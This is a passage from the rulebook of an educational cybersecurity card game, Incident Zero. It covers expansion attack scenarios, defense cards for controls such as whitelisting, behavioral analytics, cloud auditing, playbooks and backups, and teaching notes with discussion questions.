Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).

Scenario 5: "Insider Threat Explosion" (4-card chain - Intermediate)

Teaches: Insider risk detection, privileged access management, offboarding procedures 1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE 4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).

Scenario 6: "Modern Infrastructure Attack" (5-card chain - Expert)

Teaches: IoT security, cloud security, API management, defense breadth 1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL

Parallel threat: Teams must defend against both cloud and on-premises infrastructure simultaneously.

Scenario 7: "Physical Meets Cyber" (4-card chain - Intermediate)

Teaches: Physical security integration, environmental controls, holistic security 1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE 2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK 3. Scheduled Task Persistence (Persistence) → MALWARE 4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE

Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."

Scenario 8: "Supply Chain + Insider Collusion" (5-card chain - Hard)

Teaches: Complex attack coordination, detecting collusion, multi-vector threats 1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE 2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE 3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE 4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL 5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). Incomplete investigation leads to missed detection of the insider component.


Recommended Defense Cards for Expansion Threats

(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.

For Supply Chain Attacks (T-13, T-14)

For Insider Threats (T-15, T-16)

For IoT Device Compromise (T-17)

For Cloud API Abuse (T-18)

For DNS Tunneling (T-19)

For Physical Security Bypass (T-20)


Difficulty Adjustments Using Expansion Cards

Easy + Expansion (6-card chain)

Medium + Expansion (4-5 card chains with expansion)

Hard + Expansion (5+ card chains with 2+ expansion cards)


Teaching Notes for Threat Orchestrators

Supply Chain Attacks (T-13, T-14)

Real-world context: - SolarWinds (2020) - 18,000+ organizations affected - 3CX (2023) - Trojanized build system - XcodeGhost (2015) - Compromised Xcode developer tool - Typosquatted packages discovered monthly on npm/PyPI

Discussion points after reveal: - "How do you verify software authenticity?" - "What's the difference between detecting supply chain compromises vs. traditional malware?" - "Why is this harder to detect than direct attacks?"

Insider Threats (T-15, T-16)

Real-world context: - ~30-40% of data breaches involve insiders (Verizon DBIR) - Manning, Snowden, Reality Winner cases (government sector) - Thousands of employee theft cases in financial/tech industries

Discussion points after reveal: - "How would you detect insider threat indicators before damage occurs?" - "Why is offboarding security often weak?" - "What's the difference between a malicious insider and negligent employee?"

IoT Device Compromise (T-17)

Real-world context: - Mirai botnet (2016) - Millions of compromised IoT devices - Connected cameras, printers, thermostats often neglected - "Shadow IT" problem in many organizations

Discussion points after reveal: - "Should IoT devices be on the same network as critical systems?" - "How do you patch thousands of IoT devices?" - "Why are credentials often factory-default on IoT?"

Cloud API Abuse (T-18)

Real-world context: - AWS credentials leaked in GitHub ~8 times per day (GitHub telemetry) - Tesla's Kubernetes cluster hacked via exposed credentials - Capital One breach involved compromised IAM role

Discussion points after reveal: - "How do you manage API keys for thousands of developers?" - "Why is secrets rotation hard in practice?" - "How would you know if someone used your AWS API key?"

DNS Tunneling (T-19)

Real-world context: - Used by DNS.Exfiltrator, OilRig APT, Turla malware families - Hard to detect because DNS is typically trusted - Can exfil ~20 KB/hour via subdomains

Discussion points after reveal: - "Why is DNS hard to monitor?" - "What would a normal DNS query pattern look like?" - "How would you distinguish data exfil from normal DNS activity?"

Physical Security Bypass (T-20)

Real-world context: - RFID cloning demonstrated on hotel keys, building badges - Rogue network devices found in data centers (Target breach had physical component) - USB drops with malware remain effective attack vectors

Discussion points after reveal: - "Should cybersecurity teams care about physical security?" - "How do you audit data center access?" - "What's harder to defend: cyber or physical attacks?"


Expansion Threat Card Deck Summary

Card Title Step Vector Difficulty
T-13 Compromised Software Vendor Update INITIAL MALWARE Hard
T-14 Malicious Third-Party Library Injection INITIAL MALWARE Medium
T-15 Malicious Insider Data Theft C2 & EXFIL DATA EXFIL Very Hard
T-16 Disgruntled Employee Sabotage PIVOT & ESCALATE MALWARE Hard
T-17 Compromised IoT Device as Pivot Point INITIAL NETWORK Medium
T-18 Cloud API Token Theft & Abuse PIVOT & ESCALATE CREDENTIAL ABUSE Hard
T-19 DNS Tunneling Data Exfiltration C2 & EXFIL DATA EXFIL Very Hard
T-20 Physical Access + Badge Cloning INITIAL CREDENTIAL ABUSE Hard

Quick Integration Checklist


Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections

cards/incident-response/expansion-deck/advanced-defenses.md

Incident Zero: Expansion Defense Cards

Advanced Security Controls & Defensive Capabilities

This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.

Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).


ADDITIONAL DEFENSE CARDS (19 Cards)

Application Whitelisting Defenses

Card D-25: Application Whitelisting (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy application whitelisting on  │
│ critical workstations and servers.  │
│ Maintain an approved applications   │
│ list (Word, Excel, Chrome, etc.).   │
│ Block execution of any unapproved   │
│ binaries. Use AppLocker (Windows)   │
│ or similar tools.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents execution of malware and   │
│ unauthorized tools. Attackers cannot│
│ run ransomware, backdoors, or       │
│ penetration tools if they're not on │
│ the whitelist. Effective against    │
│ zero-days if not signed by trusted  │
│ publishers.                         │
│                                     │
│ LIMITATION: False positives if      │
│ maintenance is poor. Users may      │
│ struggle with legitimate tools      │
│ being blocked.                      │
└─────────────────────────────────────┘

Card D-26: Advanced Application Control with AI

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy AI-powered application       │
│ control that learns normal program  │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious    │
│ or anomalous applications.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new  │
│ applications without manual updates.│
│ Catches polymorphic malware variants│
│ that might bypass static whitelisting│
│ (different packing, slight name     │
│ changes). Reduces false positives.  │
│                                     │
│ LEARNING CURVE: Requires baseline   │
│ training period (1-2 weeks).        │
└─────────────────────────────────────┘

Card D-27: Living-Off-The-Land Blocker (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER         │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced script and tool     │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and   │
│ other "living-off-the-land" tools.  │
│ Allow only specific, monitored usage│
│ with strong justification logging.  │
│ Monitor for obfuscation patterns.   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Directly targets attacker techniques│
│ used in privilege escalation and    │
│ lateral movement (scheduled tasks,  │
│ registry modification, credential   │
│ dumping). Makes PowerShell and cmd  │
│ attacks extremely difficult.        │
│ Works especially well with EDR.     │
│                                     │
│ IMPACT: May break legitimate admin  │
│ tasks; requires strong change       │
│ management.                         │
└─────────────────────────────────────┘

Behavioral Analytics Defenses

Card D-28: Baseline Behavior Learning System (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy behavioral analytics that    │
│ establishes baseline profiles for   │
│ users, systems, and network traffic.│
│ System learns what "normal" looks   │
│ like, then alerts on deviations.    │
│ Monitors: login times, file access, │
│ network destinations, resource usage.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects anomalies like:             │
│ - Unusual login geography/time      │
│ - Data access patterns changing     │
│ - Lateral movement via SMB          │
│ - New network destinations          │
│ Works best as a *combination* with  │
│ other tools. Requires good baseline  │
│ data (1-2 weeks of normal traffic). │
│                                     │
│ DETECTS: Insider threats,           │
│ compromised credentials, APT tactics.│
└─────────────────────────────────────┘

Card D-29: Process Behavior Analysis (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS           │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy process-level behavioral     │
│ monitoring that learns what each    │
│ application normally does (file I/O,│
│ network calls, registry access,     │
│ child processes spawned). Blocks    │
│ anomalous behavior from legitimate  │
│ binaries.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches:                            │
│ - Legitimate apps compromised by    │
│  supply chain attack                │
│ - Process injection attacks         │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes    │
│ Example: Word.exe normally doesn't  │
│ spawn PowerShell; if it does, block │
│ and alert.                          │
│                                     │
│ DETECTS: Zero-day malware, APT      │
│ techniques, supply chain compromises.│
└─────────────────────────────────────┘

Card D-30: Machine Learning Anomaly Detection (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy ML models trained on terabytes│
│ of security data. System detects    │
│ subtle anomalies humans would miss: │
│ subtle timing changes, rare resource│
│ combinations, statistical outliers. │
│ Continuously retrains on new data.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems.   │
│ Detects:                            │
│ - Polymorphic malware variations    │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior)   │
│ - Sophisticated insider threats     │
│ - Supply chain compromises          │
│                                     │
│ TRADE-OFF: False positives require  │
│ human analysis. Requires large      │
│ datasets for training.              │
└─────────────────────────────────────┘

Container Security Defenses

Card D-31: Container Image Scanning (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Scan all container images before    │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate   │
│ scanning into CI/CD pipeline.       │
│ Block images with critical CVEs     │
│ from being deployed.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents deployment of vulnerable   │
│ containers. Catches:                │
│ - Old base images with known CVEs   │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into   │
│ images                              │
│ Works best when combined with       │
│ runtime monitoring.                 │
│                                     │
│ LIMITATION: Only catches known      │
│ vulnerabilities (CVE databases).    │
└─────────────────────────────────────┘

Card D-32: Container Runtime Protection (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION        │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy runtime security monitoring  │
│ that enforces security policies on  │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor   │
│ or SELinux profiles.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects and blocks:                 │
│ - Container escape attempts         │
│ - Lateral movement between containers│
│ - Privilege escalation in container │
│ - Anomalous process execution       │
│ - Unexpected network connections    │
│ Works against both known and unknown│
│ attacks (zero-day exploits).        │
│                                     │
│ REQUIREMENT: Requires kernel-level  │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘

Card D-33: Kubernetes Network Policy & RBAC (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement Kubernetes network policies│
│ to restrict container-to-container  │
│ communication. Deploy role-based     │
│ access control (RBAC) for API access│
│ and service accounts. Enforce pod   │
│ security policies and admission     │
│ controllers.                        │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Implements micro-segmentation in    │
│ containerized environments. Prevents:│
│ - Lateral movement between pods     │
│ - Container escape attacks accessing │
│  host network                       │
│ - Privilege escalation via RBAC     │
│ - Unauthorized Kubernetes API access│
│                                     │
│ COMPLEXITY: Requires mature         │
│ Kubernetes operations and expertise. │
└─────────────────────────────────────┘

Cloud Security Posture Management (CSPM)

Card D-34: Cloud Configuration Auditing (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy continuous cloud configuration│
│ monitoring (AWS Config, Azure Policy│
│ Manager, GCP Cloud Asset Inventory).│
│ Scan for misconfigured resources:   │
│ - Public S3 buckets                 │
│ - Overly permissive IAM policies    │
│ - Unencrypted databases             │
│ - Open security groups              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects misconfigurations that allow│
│ unauthorized access:                │
│ - Public database access            │
│ - Exposed credentials in configs    │
│ - Overly broad IAM permissions      │
│ - Disabled encryption/logging       │
│ Alert on drift from secure baseline.│
│                                     │
│ LIMITATION: Only catches known      │
│ misconfiguration patterns.          │
└─────────────────────────────────────┘

Card D-35: Cloud Access & Permission Auditing (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING  │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Audit all IAM roles, service        │
│ accounts, and API credentials for   │
│ over-privilege. Implement least-    │
│ privilege access. Regularly review  │
│ who has what permissions. Detect    │
│ and revoke unused credentials.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents attackers from leveraging: │
│ - Exposed API keys with broad       │
│  permissions                        │
│ - Service accounts with admin access│
│ - Stale credentials from departed   │
│  employees                          │
│ - Cross-account trust abuse         │
│ Reduces blast radius if credentials │
│ are compromised.                    │
│                                     │
│ REQUIRES: Strong governance process │
│ to maintain least-privilege state.  │
└─────────────────────────────────────┘

Card D-36: Cloud Compliance & Audit Trail (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD COMPLIANCE & AUDIT TRAIL      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable comprehensive cloud audit    │
│ logging (CloudTrail, Stackdriver,   │
│ Activity Monitor). Forward all logs  │
│ to immutable, centralized storage.  │
│ Monitor for unauthorized API calls, │
│ data access, and resource changes.  │
│ Enable MFA Delete on audit logs.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Provides forensic trail for:        │
│ - Detecting API token abuse        │
│ - Investigating data exfiltration   │
│ - Compliance reporting              │
│ - Incident response timeline        │
│ Prevents attackers from covering    │
│ tracks (immutable logs). Enables    │
│ rapid investigation of cloud API    │
│ compromises.                        │
│                                     │
│ COST: High storage requirements.    │
└─────────────────────────────────────┘

Incident Response Playbooks

Card D-37: Playbook: Ransomware Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: RANSOMWARE RESPONSE       │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built, tested ransomware response│
│ playbook covering:                  │
│ - Immediate network isolation steps │
│ - Communication procedures          │
│ - Forensic data collection          │
│ - Restoration procedures            │
│ - Stakeholder notifications         │
│ Train incident response team on     │
│ playbook annually.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 or when ransomware   │
│ is detected:                        │
│ Get +4 bonus to defense rolls when  │
│ responding to ransomware threats.   │
│ Reduces response time, limiting     │
│ damage.                             │
│                                     │
│ EDUCATIONAL VALUE: Teaches incident │
│ response process and coordination.  │
└─────────────────────────────────────┘

Card D-38: Playbook: Credential Compromise Response (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: CREDENTIAL COMPROMISE     │
│ RESPONSE                            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Pre-built playbook for credential   │
│ compromise scenarios:               │
│ - Identify affected accounts        │
│ - Forced password reset procedures  │
│ - Session invalidation              │
│ - MFA re-enrollment process         │
│ - Forensic user activity review     │
│ - Privileged account audit          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When investigating compromised      │
│ credentials:                        │
│ Get +4 bonus to defense rolls.      │
│ Allows rapid containment before     │
│ lateral movement occurs.            │
│                                     │
│ EXAMPLE USE: During "Mimikatz       │
│ Credential Dumping" threat, playbook│
│ helps isolate affected accounts.    │
└─────────────────────────────────────┘

Card D-39: Playbook: Insider Threat Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: INSIDER THREAT RESPONSE   │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Comprehensive insider threat        │
│ response playbook including:        │
│ - HR coordination protocols         │
│ - Legal review and preservation     │
│ - Forensic evidence collection      │
│ - Physical security response        │
│ - System access removal procedures  │
│ - Communication to management       │
│ Requires cross-functional team      │
│ coordination.                       │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ When responding to insider threats: │
│ Get +5 bonus to defense rolls.      │
│ Requires strong organizational      │
│ processes to be effective.          │
│                                     │
│ EXAMPLE USE: When "Malicious        │
│ Insider Data Theft" is detected,    │
│ playbook coordinates response across │
│ security, HR, legal, and executives.│
└─────────────────────────────────────┘

Card D-40: Playbook: Supply Chain Breach Response (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PLAYBOOK: SUPPLY CHAIN BREACH       │
│ RESPONSE                            │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Specialized playbook for supply     │
│ chain compromises:                  │
│ - Vendor notification procedures    │
│ - Industry coordination             │
│ - Affected system inventory         │
│ - Patch deployment prioritization   │
│ - Third-party impact assessment     │
│ - Public communication strategy     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During Phase 2 when defending       │
│ against supply chain attacks:       │
│ Get +5 bonus to defense rolls.      │
│ Requires vendor relationships and   │
│ industry collaboration.             │
│                                     │
│ LEARNING: Teaches that supply chain │
│ incidents require industry response.│
└─────────────────────────────────────┘

Backup & Disaster Recovery

Card D-41: Backup Strategy - 3-2-1 Rule (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP STRATEGY - 3-2-1 RULE        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup rule:    │
│ - 3 copies of data                  │
│ - 2 different media types           │
│ - 1 copy offline/offsite            │
│ Regular backup verification testing.│
│ Document retention and recovery RPO/│
│ RTO (Recovery Point/Time Objectives).│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ If ransomware encrypts data:        │
│ Recovery becomes possible without   │
│ paying ransom. Offline backups      │
│ ensure attacker cannot delete them. │
│ Reduces ransomware attack impact    │
│ significantly.                      │
│                                     │
│ LIMITATION: Only effective if       │
│ backups are regularly tested and    │
│ truly offline.                      │
└─────────────────────────────────────┘

Card D-42: Immutable Backup Storage (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IMMUTABLE BACKUP STORAGE            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy backup storage with WORM     │
│ (Write-Once-Read-Many) protection.  │
│ Once backups are written, they      │
│ cannot be modified or deleted,      │
│ even by administrators. Implement   │
│ MFA Delete on storage. Use air-gapped│
│ backup network.                     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Even if attacker gains admin access │
│ or compromises backup system:       │
│ Backups remain protected and        │
│ unmodifiable. Enables guaranteed    │
│ recovery. Works against double-     │
│ extortion ransomware attacks.       │
│                                     │
│ COST: Higher storage cost for       │
│ immutable solutions.                │
└─────────────────────────────────────┘

Card D-43: Disaster Recovery Plan & Testing (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DISASTER RECOVERY PLAN & TESTING    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish comprehensive disaster    │
│ recovery plan (DRP) including:      │
│ - Failover procedures               │
│ - Alternate site readiness          │
│ - Recovery procedures (step-by-step)│
│ - Communication protocols           │
│ - Key personnel contacts            │
│ Conduct quarterly DRP drills and    │
│ recovery testing.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ During ransomware or supply chain   │
│ attacks:                            │
│ Get +3 bonus to all defense rolls   │
│ after initial containment. Enables  │
│ business continuity.                │
│                                     │
│ EDUCATIONAL VALUE: Teaches business │
│ continuity planning and resilience. │
└─────────────────────────────────────┘

Defense Card Integration Guide

By Threat Type Mapping

Against Supply Chain Attacks (T-13, T-14): - D-31: Container Image Scanning - D-29: Process Behavior Analysis (catches apps compromised by supply chain attacks) - D-40: Playbook: Supply Chain Breach Response

Against Insider Threats (T-15, T-16): - D-28: Baseline Behavior Learning System - D-29: Process Behavior Analysis - D-39: Playbook: Insider Threat Response

Against IoT Compromise (T-17): - D-25: Application Whitelisting - D-31: Container Image Scanning (if containerized) - D-28: Baseline Behavior Learning System

Against Cloud API Abuse (T-18): - D-34: Cloud Configuration Auditing - D-35: Cloud Access & Permission Auditing - D-36: Cloud Compliance & Audit Trail

Against DNS Tunneling (T-19): - D-28: Baseline Behavior Learning System (network baseline) - D-30: Machine Learning Anomaly Detection

Against Physical Security Bypass (T-20): - D-28: Baseline Behavior Learning System (detection) - D-38: Playbook: Credential Compromise Response

Against Ransomware (T-11, supply chain variants): - D-41: Backup Strategy - 3-2-1 Rule - D-42: Immutable Backup Storage - D-43: Disaster Recovery Plan & Testing - D-37: Playbook: Ransomware Response


Sample Defense Card Combinations

"Enterprise Ransomware Defense" (4 cards, 55 Budget)

"Cloud-Native Security" (4 cards, 75 Budget)

"Insider Threat Detection & Response" (4 cards, 75 Budget)

"Zero-Trust Architecture" (5 cards, 95 Budget)


Hardening Module with Expansion Defense Cards

Hardening Scenario: Enterprise Defense Build-Out (7 turns, v2.2)

Starting Budget: 150 | Turn Limit: 7 (one action per turn; up to 2 BASIC defenses may be deployed as one action)

Turn 1 (Foundation): D-34 Cloud Configuration Auditing (10) + D-25 Application Whitelisting (10) — Quick-Win pair → 20 spent Turn 2 (Foundation): D-41 Backup Strategy - 3-2-1 Rule (10) + D-31 Container Image Scanning (10) — Quick-Win pair → 40 spent Turn 3 (Advanced Layer): D-28 Baseline Behavior Learning System (15) → 55 spent Turn 4 (Advanced Layer): D-32 Container Runtime Protection (15) → 70 spent Turn 5 (Advanced Layer): D-35 Cloud Access & Permission Auditing (15) → 85 spent Turn 6 (Preparation): Create MALWARE playbook (10) → 95 spent Turn 7 (Expert Layer): D-36 Cloud Compliance & Audit Trail (25) → 120 spent, 30 remaining

Final Security Score Calculation (v2.2 formula): - (8 defenses deployed × 5) = 40 points - (0 hardening upgrades × 2) = 0 points - (1 playbook × 10) = 10 points - (3 of 4 pentester tactics defended × 5) = 15 points - Budget efficiency: (30 / 150) × 10 = 2 points - Total: 67 points (Strong defense-in-depth — Victory: score ≥ 60, ≥ 4 defenses, majority of tactics defended)


Pentester Tactic Card Interactions with Defense Cards (v2.2)

When a Pentester Tactic Card (PT-01 to PT-08, see ../../hardening/core-deck/pentester-tactic-cards.md) is drawn during a Hardening phase, these expansion defenses may be chosen as the single resolving defense. Use the bonus below as the chosen defense's printed bonus in the canonical formula (d20 + printed bonus + upgrades + playbook vs. the tactic's DC):

PT-01: Social Engineering - Pretexting (DC 12)

PT-02: Malware Evasion - Living-off-the-Land (DC 13)

PT-03: Credential Dumping - Mimikatz (DC 13)

PT-04: Lateral Movement - Network Traversal (DC 13)

PT-05: Privilege Escalation - Kernel Exploit (DC 14)

PT-06: Data Exfiltration - Unmonitored Channel (DC 14)

PT-07: Supply Chain Compromise - Trusted Update (DC 14)

PT-08: Insider Threat - Malicious Administrator (DC 15)


Teaching Notes for Defense Card Expansion

Application Whitelisting (D-25, D-26, D-27)

Why it matters: - Stops 90%+ of malware variants if properly configured - "Defense in depth" - cheap to start, expensive to perfect - Trade-off: Security vs. usability (users can't run unauthorized apps)

Real-world context: - Used by government agencies and financial institutions - Apple's approach (iOS/macOS sandboxing) - Increasingly common in "zero trust" architectures

Discussion points: - "What's blocked by living-off-the-land blocker that regular whitelisting isn't?" - "Why is adoption slow despite effectiveness?"

Behavioral Analytics (D-28, D-29, D-30)

Why it matters: - Catches attacks that don't match known signatures - Foundation for modern threat detection - Requires "normal" baseline to be effective

Real-world context: - Splunk, Elastic, Sentinel use behavioral analytics - UEBA systems detect insider threats - Process behavior monitoring by Crowdstrike, Falcon, Tanium

Discussion points: - "What counts as 'abnormal' and who decides?" - "How do you build a baseline without including attacks?" - "Why can't signature-based antivirus do this?"

Container Security (D-31, D-32, D-33)

Why it matters: - Container environments have unique attack surfaces - Rapid deployment means traditional approaches fail - Network segmentation at container level is powerful

Real-world context: - Kubernetes is now the standard container orchestrator - Docker/container adoption is 90%+ in enterprises - Container escape vulnerabilities (runc, containerd, etc.)

Discussion points: - "How is container security different from VM security?" - "Why is network policy critical in Kubernetes?" - "What's an example of a container escape attack?"

Cloud Security Posture Management (D-34, D-35, D-36)

Why it matters: - Cloud misconfigurations are leading breach cause - Shared responsibility model confuses organizations - API-driven access requires different monitoring

Real-world context: - Hundreds of millions exposed via public S3 buckets - Capital One breach: misconfigured WAF - Equifax: unpatched open-source component in cloud environment

Discussion points: - "Who's responsible for cloud security: vendor or organization?" - "How do you audit permissions when there are 1000s of IAM roles?" - "Why is 'least privilege' hard to achieve in practice?"

Incident Response Playbooks (D-37, D-38, D-39, D-40)

Why it matters: - Pre-planning reduces response time significantly - Coordination across teams is critical - Written procedures prevent panic decisions

Real-world context: - Organizations without playbooks average 9+ month detection time - With playbooks, average drops to 3-4 months - Playbooks required by HIPAA, PCI-DSS, NIST frameworks

Discussion points: - "Who should be involved in ransomware response?" - "How do you balance forensics with business recovery?" - "Why test playbooks if you hope to never use them?"

Backup & Disaster Recovery (D-41, D-42, D-43)

Why it matters: - Ransomware made backups critical (not just compliance) - Recovery is often cheapest way to respond to attacks - Immutable backups prevent attacker deletion

Real-world context: - Many ransomware attacks double-extort (steal + encrypt) - Immutable backups became critical after backup deletion attacks - AWS S3, Azure Blob WORM protection adopted widely

